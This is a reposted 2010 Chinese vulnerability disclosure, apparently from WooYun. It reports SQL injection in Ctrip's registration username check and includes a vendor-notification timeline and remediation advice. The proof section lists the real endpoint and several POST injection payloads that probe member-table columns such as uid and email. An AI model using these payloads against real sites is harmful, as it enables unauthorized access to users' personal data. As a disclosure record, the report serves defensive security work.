携程网某ajax验证存在sql注入
漏洞詳情
披露狀態(tài):
2010-07-30: 細(xì)節(jié)已通知廠商并且等待廠商處理中
2010-07-30: 廠商已經(jīng)確認(rèn),細(xì)節(jié)僅向廠商公開
2010-08-09: 細(xì)節(jié)向核心白帽子及相關(guān)領(lǐng)域?qū)<夜_
2010-08-19: 細(xì)節(jié)向普通白帽子公開
2010-08-29: 細(xì)節(jié)向?qū)嵙?xí)白帽子公開
2010-08-29: 細(xì)節(jié)向公眾公開
簡(jiǎn)要描述:
位置較敏感,發(fā)生在members表,可以發(fā)現(xiàn)表的一些字段,能夠竊取任何人的包括email等信息,未深入測(cè)試
詳細(xì)說明:
用戶注冊(cè)時(shí),"驗(yàn)證用戶是否存在"因過濾不嚴(yán)謹(jǐn)導(dǎo)致sql注入
另外:
http://www.ctrip.com/robots.txt
http://destguides.ctrip.com/destguides/journals/AllSingleJournals.aspx?Writing=130079%27%273
暴露了敏感信息
漏洞證明:
http://www.ctrip.com/member/CheckUser.asp
post: signup_uid=xyyxx1x'/**/order/**/by/**/1--
post: signup_uid=xyyxx1x'/**/order/**/by/**/uid--
post: signup_uid=xyyxx1x'/**/order/**/by/**/email--
嘗試不正確的字段導(dǎo)致不同結(jié)果,輸入".`"等字符及其它注入手段測(cè)試(可能存在ids)
修復(fù)方案:
1.白名單驗(yàn)證
2.屏蔽或友好提示錯(cuò)誤
版權(quán)聲明:轉(zhuǎn)載請(qǐng)注明來源?路人甲@烏云
總結(jié)
以上是生活随笔為你收集整理的携程网某ajax验证存在sql注入的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: snomed ct
- 下一篇: 技术干货 | 录屏采集实现教程 —— i